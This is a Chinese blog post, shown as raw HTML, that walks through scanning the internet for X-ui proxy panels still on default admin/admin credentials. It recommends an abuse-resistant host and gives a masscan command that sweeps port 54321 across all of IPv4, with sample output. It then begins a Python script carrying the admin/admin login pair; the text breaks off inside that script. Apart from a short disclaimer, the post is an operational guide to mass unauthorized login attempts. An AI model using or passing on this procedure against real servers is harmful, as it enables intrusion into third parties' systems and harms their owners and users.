<!DOCTYPE html>
<html lang="zh-cn" dir="ltr">
    <head><meta charset='utf-8'>
<meta name='viewport' content='width=device-width, initial-scale=1'><meta name='description' content='一点技术含量都没有，仅作为技术研究文，麻烦看看宇宙安全声明'>
<title>扫描弱密码的 X-ui 面板</title>

<link rel='canonical' href='https://blog.highp.ing/p/xui-scanner/'>

<link rel="stylesheet" href="/scss/style.min.abbd69b2908fdfcd5179898beaafd374514a86538d81639ddd2c58c06ae54e40.css"><meta property='og:title' content='扫描弱密码的 X-ui 面板'>
<meta property='og:description' content='一点技术含量都没有，仅作为技术研究文，麻烦看看宇宙安全声明'>
<meta property='og:url' content='https://blog.highp.ing/p/xui-scanner/'>
<meta property='og:site_name' content='HighPing们の小小藏身地'>
<meta property='og:type' content='article'><meta property='article:section' content='Post' /><meta property='article:published_time' content='2024-01-28T00:00:00&#43;00:00'/><meta property='article:modified_time' content='2024-01-28T00:00:00&#43;00:00'/><meta property='og:image' content='https://blog.highp.ing/p/xui-scanner/O1CN018qw1rw1nQWUL5Ppa7_%21%212401945084.jpg' />
<meta name="twitter:title" content="扫描弱密码的 X-ui 面板">
<meta name="twitter:description" content="一点技术含量都没有，仅作为技术研究文，麻烦看看宇宙安全声明"><meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:image" content='https://blog.highp.ing/p/xui-scanner/O1CN018qw1rw1nQWUL5Ppa7_%21%212401945084.jpg' />
    </head>
    <body class="
    article-page
    ">
    <script>
        (function() {
            const colorSchemeKey = 'StackColorScheme';
            if(!localStorage.getItem(colorSchemeKey)){
                localStorage.setItem(colorSchemeKey, "auto");
            }
        })();
    </script><script>
    (function() {
        const colorSchemeKey = 'StackColorScheme';
        const colorSchemeItem = localStorage.getItem(colorSchemeKey);
        const supportDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches === true;

        if (colorSchemeItem == 'dark' || colorSchemeItem === 'auto' && supportDarkMode) {
            

            document.documentElement.dataset.scheme = 'dark';
        } else {
            document.documentElement.dataset.scheme = 'light';
        }
    })();
</script>
<div class="container main-container flex on-phone--column extended"><aside class="sidebar left-sidebar sticky ">
    <button class="hamburger hamburger--spin" type="button" id="toggle-menu" aria-label="切换菜单">
        <span class="hamburger-box">
            <span class="hamburger-inner"></span>
        </span>
    </button>

    <header>
        
            
            <figure class="site-avatar">
                <a href="/">
                
                    <img src="https://i2.100024.xyz/2024/01/01/umato9.webp" width="300" height="300" class="site-logo" loading="lazy" alt="Avatar">
                
                </a>
                
                    <span class="emoji">😇</span>
                
            </figure>
            
        
        
        <div class="site-meta">
            <h1 class="site-name"><a href="/">HighPing们の小小藏身地</a></h1>
            <h2 class="site-description">High Ping Network</h2>
        </div>
    </header><ol class="social-menu">
            
                <li>
                    <a 
                        href='https://github.com/High-Ping-Network'
                        target="_blank"
                        title="GitHub"
                        rel="me"
                    >
                        
                        
                            <svg t="1706662022006" class="icon" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="4198" width="200" height="200"><path d="M512.465 98.744c-236.05-2.401-429.41 187.034-431.998 423.242 0.894 183.912 120.176 346.283 295.332 402.018 21.6 3.93 29.451-9.04 29.451-20.436v-71.916c-120.17 25.545-145.7-56.59-145.7-56.59a112.364 112.364 0 0 0-47.914-62.089c-39.272-25.937 3.141-25.545 3.141-25.545a90.702 90.702 0 0 1 65.978 43.624c25.358 43.993 81.26 59.548 125.678 34.976a91.569 91.569 0 0 1 27.487-56.59c-95.825-10.615-196.36-46.768-196.36-209.067a163.13 163.13 0 0 1 43.591-114.358 148.652 148.652 0 0 1 4.32-111.609c15.896-35.223 36.525-11.397 117.815 43.229a419.24 419.24 0 0 1 216.002 0c82.471-54.626 117.82-43.229 117.82-43.229a148.657 148.657 0 0 1 4.32 111.61 163.145 163.145 0 0 1 45.945 113.57c0 162.695-101.321 198.458-196.36 209.067a98.273 98.273 0 0 1 29.452 78.594v115.933c0 13.752 7.856 24.756 29.457 20.43 174.63-56.071 293.466-218.106 294.545-401.622C941.878 285.778 748.52 96.343 512.465 98.744" fill="#231F20" p-id="4199"></path></svg>

                        
                    </a>
                </li>
            
                <li>
                    <a 
                        href='http:/t.me/HighPingNetwork'
                        target="_blank"
                        title="telegram"
                        rel="me"
                    >
                        
                        
                            <svg t="1706421640444" class="icon" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="4205" width="200" height="200"><path d="M912.213333 154.026667A85.333333 85.333333 0 0 0 853.333333 128a85.333333 85.333333 0 0 0-33.28 6.826667l-708.266666 306.773333a42.666667 42.666667 0 0 0-26.453334 42.666667V512a42.666667 42.666667 0 0 0 29.44 42.666667L298.666667 616.106667l55.466666 187.306666a75.946667 75.946667 0 0 0 56.32 53.333334 62.72 62.72 0 0 0 15.36 0 73.813333 73.813333 0 0 0 50.773334-20.48l67.84-64 131.413333 103.68a85.333333 85.333333 0 0 0 90.026667 9.386666l14.08-7.253333a88.32 88.32 0 0 0 46.506666-62.72L938.666667 235.093333a90.026667 90.026667 0 0 0-26.453334-81.066666zM763.733333 805.12a25.173333 25.173333 0 0 1-12.8 17.493333l-14.08 7.253334a19.626667 19.626667 0 0 1-8.96 2.133333 19.626667 19.626667 0 0 1-12.373333-4.693333l-160.426667-128a20.906667 20.906667 0 0 0-27.733333 0l-94.72 89.173333a11.093333 11.093333 0 0 1-5.973333 2.133333V640a21.76 21.76 0 0 1 6.826666-15.786667c136.106667-128 217.6-199.68 266.24-240.64a15.786667 15.786667 0 0 0 5.12-11.093333 13.653333 13.653333 0 0 0-4.266666-11.093333 14.933333 14.933333 0 0 0-17.92-4.266667l-322.56 203.52a21.333333 21.333333 0 0 1-18.346667 0L149.333333 494.933333l694.186667-301.226666a16.64 16.64 0 0 1 7.68 0 22.186667 22.186667 0 0 1 16.213333 7.68 26.88 26.88 0 0 1 6.826667 23.466666z" p-id="4206"></path></svg>

                        
                    </a>
                </li>
            
                <li>
                    <a 
                        href='http://highp.ing'
                        target="_blank"
                        title="Web"
                        rel="me"
                    >
                        
                        
                            <svg t="1706661682676" class="icon" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="4223" width="200" height="200"><path d="M698.026667 597.333333C701.44 569.173333 704 541.013333 704 512 704 482.986667 701.44 454.826667 698.026667 426.666667L842.24 426.666667C849.066667 453.973333 853.333333 482.56 853.333333 512 853.333333 541.44 849.066667 570.026667 842.24 597.333333M622.506667 834.56C648.106667 787.2 667.733333 736 681.386667 682.666667L807.253333 682.666667C766.293333 753.066667 701.013333 807.68 622.506667 834.56M611.84 597.333333 412.16 597.333333C407.893333 569.173333 405.333333 541.013333 405.333333 512 405.333333 482.986667 407.893333 454.4 412.16 426.666667L611.84 426.666667C615.68 454.4 618.666667 482.986667 618.666667 512 618.666667 541.013333 615.68 569.173333 611.84 597.333333M512 851.626667C476.586667 800.426667 448 743.68 430.506667 682.666667L593.493333 682.666667C576 743.68 547.413333 800.426667 512 851.626667M341.333333 341.333333 216.746667 341.333333C257.28 270.506667 322.986667 215.893333 401.066667 189.44 375.466667 236.8 356.266667 288 341.333333 341.333333M216.746667 682.666667 341.333333 682.666667C356.266667 736 375.466667 787.2 401.066667 834.56 322.986667 807.68 257.28 753.066667 216.746667 682.666667M181.76 597.333333C174.933333 570.026667 170.666667 541.44 170.666667 512 170.666667 482.56 174.933333 453.973333 181.76 426.666667L325.973333 426.666667C322.56 454.826667 320 482.986667 320 512 320 541.013333 322.56 569.173333 325.973333 597.333333M512 171.946667C547.413333 223.146667 576 280.32 593.493333 341.333333L430.506667 341.333333C448 280.32 476.586667 223.146667 512 171.946667M807.253333 341.333333 681.386667 341.333333C667.733333 288 648.106667 236.8 622.506667 189.44 701.013333 216.32 766.293333 270.506667 807.253333 341.333333M512 85.333333C276.053333 85.333333 85.333333 277.333333 85.333333 512 85.333333 747.52 276.48 938.666667 512 938.666667 747.52 938.666667 938.666667 747.52 938.666667 512 938.666667 276.48 747.52 85.333333 512 85.333333Z" p-id="4224"></path></svg>

                        
                    </a>
                </li>
            
        </ol><ol class="menu" id="main-menu">
        
        
        
        <li >
            <a href='/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-home" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <polyline points="5 12 3 12 12 3 21 12 19 12" />
  <path d="M5 12v7a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-7" />
  <path d="M9 21v-6a2 2 0 0 1 2 -2h2a2 2 0 0 1 2 2v6" />
</svg>



                
                <span>主页</span>
            </a>
        </li>
        
        
        <li >
            <a href='/%E5%85%B3%E4%BA%8E/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-user" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="7" r="4" />
  <path d="M6 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" />
</svg>



                
                <span>关于</span>
            </a>
        </li>
        
        
        <li >
            <a href='/archives/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-archive" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <rect x="3" y="4" width="18" height="4" rx="2" />
  <path d="M5 8v10a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-10" />
  <line x1="10" y1="12" x2="14" y2="12" />
</svg>



                
                <span>Archives</span>
            </a>
        </li>
        
        
        <li >
            <a href='/search/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-search" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="10" cy="10" r="7" />
  <line x1="21" y1="21" x2="15" y2="15" />
</svg>



                
                <span>Search</span>
            </a>
        </li>
        
        
        <li >
            <a href='/links/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-link" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <path d="M10 14a3.5 3.5 0 0 0 5 0l4 -4a3.5 3.5 0 0 0 -5 -5l-.5 .5" />
  <path d="M14 10a3.5 3.5 0 0 0 -5 0l-4 4a3.5 3.5 0 0 0 5 5l.5 -.5" />
</svg>



                
                <span>Links</span>
            </a>
        </li>
        

        <div class="menu-bottom-section">
                <li id="i18n-switch">  
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-language" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z" fill="none"/>
  <path d="M4 5h7" />
  <path d="M9 3v2c0 4.418 -2.239 8 -5 8" />
  <path d="M5 9c-.003 2.144 2.952 3.908 6.7 4" />
  <path d="M12 20l4 -9l4 9" />
  <path d="M19.1 18h-6.2" />
</svg>



                    <select name="language" onchange="window.location.href = this.selectedOptions[0].value">
                        
                            <option value="https://blog.highp.ing/en/" >English</option>
                        
                            <option value="https://blog.highp.ing/" selected>中文</option>
                        
                    </select>
                </li>
            
            
            
                <li id="dark-mode-toggle">
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-left" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="8" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-right" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="16" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                    <span>暗色模式</span>
                </li>
            
        </div>
    </ol>
</aside>

    <aside class="sidebar right-sidebar sticky">
        
            
                
    <section class="widget archives">
        <div class="widget-icon">
            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-hash" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <line x1="5" y1="9" x2="19" y2="9" />
  <line x1="5" y1="15" x2="19" y2="15" />
  <line x1="11" y1="4" x2="7" y2="20" />
  <line x1="17" y1="4" x2="13" y2="20" />
</svg>



        </div>
        <h2 class="widget-title section-title">目录</h2>
        
        <div class="widget--toc">
            <nav id="TableOfContents">
  <ol>
    <li><a href="#宇宙安全声明">宇宙安全声明</a></li>
    <li><a href="#前言">前言</a></li>
    <li><a href="#how-to-scan">How to scan?</a>
      <ol>
        <li><a href="#基本思路">基本思路</a></li>
        <li><a href="#masscan">Masscan</a>
          <ol>
            <li><a href="#获取服务商-ip-cidr-ranges">获取服务商 IP Cidr Ranges</a></li>
            <li><a href="#启动-masscan">启动 Masscan</a></li>
          </ol>
        </li>
        <li><a href="#python-测活">Python 测活</a></li>
        <li><a href="#出结果咯">出结果咯</a></li>
      </ol>
    </li>
    <li><a href="#后记">后记</a></li>
  </ol>
</nav>
        </div>
    </section>

            
        
    </aside>


            <main class="main full-width">
    <article class="has-image main-article">
    <header class="article-header">
        <div class="article-image">
            <a href="/p/xui-scanner/">
                <img src="/p/xui-scanner/O1CN018qw1rw1nQWUL5Ppa7_!!2401945084_hu703d28d52e80908a4d38c70ccf0bd48a_1257490_800x0_resize_q75_box.jpg"
                        srcset="/p/xui-scanner/O1CN018qw1rw1nQWUL5Ppa7_!!2401945084_hu703d28d52e80908a4d38c70ccf0bd48a_1257490_800x0_resize_q75_box.jpg 800w, /p/xui-scanner/O1CN018qw1rw1nQWUL5Ppa7_!!2401945084_hu703d28d52e80908a4d38c70ccf0bd48a_1257490_1600x0_resize_q75_box.jpg 1600w"
                        width="800" 
                        height="450" 
                        loading="lazy"
                        alt="Featured image of post 扫描弱密码的 X-ui 面板" />
                
            </a>
        </div>
    

    <div class="article-details">
    
    <header class="article-category">
        
            <a href="/categories/main/" >
                Main
            </a>
        
            <a href="/categories/linux/" >
                Linux
            </a>
        
    </header>
    

    <div class="article-title-wrapper">
        <h2 class="article-title">
            <a href="/p/xui-scanner/">扫描弱密码的 X-ui 面板</a>
        </h2>
    
        
        <h3 class="article-subtitle">
            一点技术含量都没有，仅作为技术研究文，麻烦看看宇宙安全声明
        </h3>
        
    </div>

    
    
    
    
    <footer class="article-time">
        
            <div>
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-calendar-time" width="56" height="56" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <path d="M11.795 21h-6.795a2 2 0 0 1 -2 -2v-12a2 2 0 0 1 2 -2h12a2 2 0 0 1 2 2v4" />
  <circle cx="18" cy="18" r="4" />
  <path d="M15 3v4" />
  <path d="M7 3v4" />
  <path d="M3 11h16" />
  <path d="M18 16.496v1.504l1 1" />
</svg>
                <time class="article-time--published">Jan 28, 2024</time>
            </div>
        

        
            <div>
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



                <time class="article-time--reading">
                    阅读时长: 4 分钟
                </time>
            </div>
        
    </footer>
    

    
</div>

</header>

    <section class="article-content">
    
    
    <h1 id="扫描弱密码的-x-ui-面板">扫描弱密码的 X-ui 面板</h1>
<p>本文由 <code>High Ping Network</code> 的小伙伴 GenshinMinecraft 进行编撰，首发于 <a class="link" href="https://blog.highp.ing/"  target="_blank" rel="noopener"
    >本博客</a></p>
<h2 id="宇宙安全声明">宇宙安全声明</h2>
<ul>
<li>本人仅将本文作为技术研究文</li>
<li>对于执行扫描的机器的 Abuse 投诉 或 导致服务商停机，本人不做任何负责</li>
<li>对于 由于参考了本文的人扫描到的 X-ui 用户，本人不做任何负责</li>
</ul>
<h2 id="前言">前言</h2>
<p><code>X-ui</code> 面板作为大众化的 节点面板，其安全性有待考证，但是其默认安装脚本的 <code>54321</code> 端口和 <code>admin</code> 帐密是一点安全不带</p>
<p>所以就造就了很多 X-ui Scanner 的出现</p>
<h2 id="how-to-scan">How to scan?</h2>
<p>前言不想写太多了，开干就行了</p>
<h3 id="基本思路">基本思路</h3>
<ol>
<li>首先，找一台能够发包的机器，带宽 500Mbps 就够，最好抗投诉 (比如Buyvm)</li>
<li>利用扫描工具找出 54321 端口开放的IP</li>
<li>脚本发送 Post admin 帐密到 54321 端口，返回成功便记录</li>
</ol>
<p>你看，就这么简单，我估计但凡有点网络安全扫描基础的人就可以手搓一个</p>
<h3 id="masscan">Masscan</h3>
<p>这一次，我们选用了 Masscan 进行扫描，其相比于 Zmap/Nmap 具备更好的速度</p>
<h4 id="获取服务商-ip-cidr-ranges">获取服务商 IP Cidr Ranges</h4>
<p>这一步要看各种服务商的操作来，比较通用的是第二种方法</p>
<h5 id="去到服务商的官网查找">去到服务商的官网查找</h5>
<p>这一方案仅适用于 大型服务商 (比如 Azure 或 Amazon)，其一般会公示他们所有服务所有的 IP Ranges</p>
<p>比如 Azure 的 IP Ranges 就可以在其<a class="link" href="https://www.microsoft.com/en-us/download/details.aspx?id=56519"  target="_blank" rel="noopener"
    >官网下载中心</a>找到</p>
<p><img src="/p/xui-scanner/Screenshot_20240127-200846.png"
	width="2560"
	height="1600"
	srcset="/p/xui-scanner/Screenshot_20240127-200846_hu9a01f1b8ae03645d5db356d8b00f75d7_260539_480x0_resize_box_3.png 480w, /p/xui-scanner/Screenshot_20240127-200846_hu9a01f1b8ae03645d5db356d8b00f75d7_260539_1024x0_resize_box_3.png 1024w"
	loading="lazy"
	
		alt="Screenshot_20240127-200846.png"
	
	
		class="gallery-image" 
		data-flex-grow="160"
		data-flex-basis="384px"
	
></p>
<p>下载下来大概是这样的:</p>
<p><img src="/p/xui-scanner/Screenshot_20240127-201014.png"
	width="2560"
	height="1600"
	srcset="/p/xui-scanner/Screenshot_20240127-201014_hu24b320865576d8d699d8cb0fcaec3bb0_195431_480x0_resize_box_3.png 480w, /p/xui-scanner/Screenshot_20240127-201014_hu24b320865576d8d699d8cb0fcaec3bb0_195431_1024x0_resize_box_3.png 1024w"
	loading="lazy"
	
		alt="Screenshot_20240127-201014.png"
	
	
		class="gallery-image" 
		data-flex-grow="160"
		data-flex-basis="384px"
	
></p>
<p>先别急，要将 IPv4 的 Ranges 提取出来，我们采用 类Unix系统 下的 Grep 工具</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">grep -oP <span class="s1">&#39;\b(?:\d{1,3}\.){3}\d{1,3}/\d{1,2}\b&#39;</span> <span class="o">[</span>下载的Json<span class="o">]</span> &gt; <span class="o">[</span>输出的文件<span class="o">]</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>然后，你就会得到一个仅有 IPv4 Cidr Ranges 的 Txt 文本文件</p>
<p>用你喜欢的方式，将其中的<strong>换行</strong>改为<strong>空格</strong>，一般推荐 MT管理器 内置的文本编辑器。只需要寻找 <code>&quot;\n&quot;</code> 再替换为 <code>&quot; &quot;</code> 就行</p>
<p>留作备用，稍等会用到！</p>
<h5 id="去查找服务商的-asn-信息">去查找服务商的 ASN 信息</h5>
<p>这个方法比较方便，也差不多</p>
<p>可以在 <a class="link" href="http://ip.bczs.net/"  target="_blank" rel="noopener"
    >http://ip.bczs.net/</a> 输入需要查找的 ASN Number，即可列出该 ASN 下所有的 IP Ranges</p>
<p>也是和上面一样，把它格式化为类似于 <code>1.1.0.0/1 1.2.0.0/1 ...</code> 的格式，留所备用</p>
<h4 id="启动-masscan">启动 Masscan</h4>
<p>安装好 Masscan 与 Libpcap，后者为前者的依赖</p>
<p>这里提供一下 Debian 系列系统的安装方式:</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">apt update
</span></span><span class="line"><span class="cl">apt install masscan libpcap-dev
</span></span></code></pre></td></tr></table>
</div>
</div><p>其他系统自行解决</p>
<p>启动 Masscan，输入如下命令 (建议使用 Screen 进行保活，避免因为 SSH 等原因断连而导致扫描中断，<a class="link" href="https://blog.highp.ing/p/screen/"  target="_blank" rel="noopener"
    >教程点我</a>)</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">masscan --exclude 255.255.255.255 -p54321 --max-rate <span class="m">5000</span> -oG results.txt <span class="o">[</span>上面获取的 IP Ranges, 用空格隔开<span class="o">]</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>解析一下各部分的意义:</p>
<ul>
<li><code>masscan</code>: Masscan 主命令</li>
<li><code>--exclude 255.255.255.255</code>: 对于扫描量巨大的扫描，必须要加上该参数</li>
<li><code>-p54321</code>: 指定端口 54321</li>
<li><code>--max-rate 5000</code>: 最大扫描速度，5000 已经足够，如果机器性能&amp;网卡强劲可以尝试拉高以增加速度</li>
<li><code>-oG results.txt</code>: 结果保存路径，建议别更改</li>
</ul>
<p>然后，你大概会看到</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2024-01-27 11:00:04 GMT
</span></span><span class="line"><span class="cl">Initiating SYN Stealth Scan
</span></span><span class="line"><span class="cl">Scanning 4294967295 hosts [1 port/host]
</span></span><span class="line"><span class="cl">rate:  4.94-kpps,  0.63% done, 243:48:38 remaining, found=45503
</span></span></code></pre></td></tr></table>
</div>
</div><p>这样就算开始扫描了，其中各部分解释意义</p>
<ul>
<li>第一第二行不用管</li>
<li>第三行的 <code>4294967295</code> 为扫描的 IP 数量，你应该不难发现我在扫 <code>0.0.0.0/0</code> (全网)</li>
<li>第四行的 <code>4.94-kpps</code> 为扫描速率</li>
<li>第四行的 <code>0.63%</code> 表示扫描的进度</li>
<li>第四行的 <code>243:48:38</code> 表示的是剩余时间 (预估)</li>
<li>第四行的 <code>found=45503</code> 表示的是已经找到的 IP 数量</li>
</ul>
<p>等它一会 (看你的 IP 有多少)</p>
<p>就会收获一个 results.txt 文件了，保存好给下一步！</p>
<h3 id="python-测活">Python 测活</h3>
<p>这是一段 Python3 的代码，将其保存到一个 <code>scan.py</code> 文件中</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span><span class="lnt">32
</span><span class="lnt">33
</span><span class="lnt">34
</span><span class="lnt">35
</span><span class="lnt">36
</span><span class="lnt">37
</span><span class="lnt">38
</span><span class="lnt">39
</span><span class="lnt">40
</span><span class="lnt">41
</span><span class="lnt">42
</span><span class="lnt">43
</span><span class="lnt">44
</span><span class="lnt">45
</span><span class="lnt">46
</span><span class="lnt">47
</span><span class="lnt">48
</span><span class="lnt">49
</span><span class="lnt">50
</span><span class="lnt">51
</span><span class="lnt">52
</span><span class="lnt">53
</span><span class="lnt">54
</span><span class="lnt">55
</span><span class="lnt">56
</span><span class="lnt">57
</span><span class="lnt">58
</span><span class="lnt">59
</span><span class="lnt">60
</span><span class="lnt">61
</span><span class="lnt">62
</span><span class="lnt">63
</span><span class="lnt">64
</span><span class="lnt">65
</span><span class="lnt">66
</span><span class="lnt">67
</span><span class="lnt">68
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">requests</span>
</span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">concurrent.futures</span> <span class="kn">import</span> <span class="n">ThreadPoolExecutor</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">data</span> <span class="o">=</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="s1">&#39;username&#39;</span><span class="p">:</span> <span class="s1">&#39;admin&#39;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">    <span class="s1">&#39;password&#39;</span><span class="p">:</span> <span class="s1">&#39;admin&#39;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">get_ip_info</span><span class="p">(</span><span class="n">ip</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">url</span> <span class="o">=</span> <span class="sa">f</span><span class="s2">&#34;http://ip-api.com/json/</span><span class="si">{</span><span class="n">ip</span><span class="si">}</span><span class="s2">?fields=country,regionName,city,isp&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="k">try</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">2</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="n">response</span><span class="o">.</span><span class="n">status_code</span> <span class="o">==</span> <span class="mi">200</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="n">ip_info</span> <span class="o">=</span> <span class="n">response</span><span class="o">.</span><span class="n">json</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">            <span class="n">country</span> <span class="o">=</span> <span class="n">ip_info</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">&#39;country&#39;</span><span class="p">,</span> <span class="s1">&#39;N/A&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">            <span class="n">region</span> <span class="o">=</span> <span class="n">ip_info</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">&#39;regionName&#39;</span><span class="p">,</span> <span class="s1">&#39;N/A&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">            <span class="n">city</span> <span class="o">=</span> <span class="n">ip_info</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">&#39;city&#39;</span><span class="p">,</span> <span class="s1">&#39;N/A&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">            <span class="n">isp</span> <span class="o">=</span> <span class="n">ip_info</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">&#39;isp&#39;</span><span class="p">,</span> <span class="s1">&#39;N/A&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">            <span class="k">return</span> <span class="sa">f</span><span class="s2">&#34;</span><span class="si">{</span><span class="n">country</span><span class="si">}</span><span class="s2">, </span><span class="si">{</span><span class="n">region</span><span class="si">}</span><span class="s2">, </span><span class="si">{</span><span class="n">city</span><span class="si">}</span><span class="s2">, ISP: </span><span class="si">{</span><span class="n">isp</span><span class="si">}</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">exceptions</span><span class="o">.</span><span class="n">RequestException</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="k">pass</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="s1">&#39;N/A&#39;</span>
</span></span><span class="line"><span class="cl">
